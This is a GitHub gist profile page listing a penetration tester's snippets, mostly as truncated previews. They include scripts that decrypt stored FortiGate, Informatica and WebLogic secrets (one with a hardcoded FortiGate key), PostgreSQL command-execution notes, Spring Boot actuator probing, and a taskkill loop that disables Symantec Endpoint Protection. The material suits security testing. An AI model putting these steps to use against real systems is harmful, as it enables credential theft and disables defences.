Skip to content

Instantly share code, notes, and snippets.

View gquere's full-sized avatar

Guillaume Quéré gquere

View GitHub Profile
@gquere
gquere / crack_tomcat_hash.md
Created March 29, 2023 12:34
Crack tomcat-users.xml salted sha256 hash using john
@gquere
gquere / informatica_105_decrypt.py
Created March 13, 2023 11:15
Decrypt Informatica 10.5 secrets
#!/usr/bin/env python3
import argparse
import base64
import re
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
parser = argparse.ArgumentParser(description = 'Decrypt Informatica passwords')
parser.add_argument('-k', '--sitekey', type=str, required=True)
parser.add_argument('secret', type=str)
@gquere
gquere / PostgreSQL_pentest.md
Last active March 17, 2023 14:18
PostgreSQL pentest notes

PostgreSQL RCE

Need Superuser rights.

Shared object

Simple SO to run blind commands:

//gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
#include <string.h>
@gquere
gquere / jconsole.md
Last active October 17, 2022 09:38
jconsole certificate error

If jconsole doesn't trust the remote server's CA then on Linux it will fail with

Connection failed: error during JRMP connection establishment; nest exception is: java.io.EOFException

On Windows I got this error instead (?):

Connection failed: non-JRMP server at remote endpoint

This is solved by downloading the server's certificate and converting it to a keystore:

true | openssl s_client -connect server.com | openssl x509 > serv.cert
keytool -import -alias serv -keystore serv.jks -file serv.cert
#!/usr/bin/env python3
import requests
import sys
import urllib3
# https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/spring-boot.txt
actuators = [ 'trace', 'health', 'loggers', 'logfile', 'metrics', 'autoconfig', 'heapdump', 'env', 'env/home', 'env/pwd', 'env/lang', 'env/language', 'env/tz', 'env/path', 'env/hostname', 'info', 'dump', 'configprops', 'cloudfoundryapplication', 'features', 'flyway', 'liquibase', 'mappings', 'version', 'auditevents', 'beans', 'gateway/routes', 'actuator', 'actuator/auditLog', 'actuator/auditevents', 'actuator/beans', 'actuator/caches', 'actuator/conditions', 'actuator/configurationMetadata', 'actuator/configprops', 'actuator/dump', 'actuator/env', 'actuator/env/home', 'actuator/env/pwd', 'actuator/env/lang', 'actuator/env/language', 'actuator/env/tz', 'actuator/env/path', 'actuator/env/hostname', 'actuator/events', 'actuator/exportRegisteredServices', 'actuator/features', 'actuator/flyway', 'actuator/gateway/routes', 'actuator/health', 'actu
@gquere
gquere / artifactory_downloader.py
Last active April 4, 2022 12:00
Artifactory downloader
#!/usr/bin/env python3
import sys
import requests
import re
from packaging import version
# IGNORE SSL WARNING ###########################################################
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@gquere
gquere / fortigate_decrypt.py
Last active August 15, 2023 17:27
Decrypt FortiGate configuration secrets CVE-2019-6693
#!/usr/bin/env python3
from Cryptodome.Cipher import AES
import base64
import sys
key = b'Mary had a littl'
data = base64.b64decode(sys.argv[1])
iv = data[0:4] + b'\x00' * 12
@gquere
gquere / weblogic_password.decrypt.py
Last active June 23, 2023 20:35
Weblogic password decrypt python
#!/usr/bin/env python3
# python3 port from https://github.com/L-codes/ctf-scripts/blob/master/crypto/weblogic_password.py
# /console/ login account
# -i ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/security/SerializedSystemIni.dat
# -f ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/config/config.xml
from Cryptodome.Cipher import ARC2, AES, DES3
from Cryptodome.Hash import SHA
import struct
import re

Kill it!

As admin launch SymCorpUi.exe and unprotect SEP in options.

for /L %n in (1,0,10) do taskkill /F /IM ccSvcHst.exe & timeout 1

Privesc